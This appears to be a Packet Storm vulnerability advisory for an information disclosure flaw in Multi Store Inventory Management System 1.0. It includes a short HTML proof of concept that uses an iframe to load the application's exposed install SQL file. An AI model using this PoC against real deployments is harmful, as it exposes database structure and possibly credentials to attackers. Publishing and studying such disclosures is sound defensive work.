Multi Store Inventory Management System version 1.0 suffers from an information disclosure vulnerability.
20c9b3bbd1a997e40ad6e204b1e0e0e2dbbb6f204e12272f722ff28c44c3d94f# Exploit Title: Multi Store Inventory Management System - Information Disclosure
# Date: 04/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Contact: https://twitter.com/dmaral3noz
# Description :
The application allows directory listing and information disclosure of
some sensitive files that can allow an attacker to leverage the disclosed
information.
################################################
PoC Html :
<html>
<head><body>
<title>Multi Store Inventory Management System - Information Disclosure</title>
<iframe
src=https://127.0.0.1/multistore_demo/install/sql/install.sql>
</body></head>
<html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed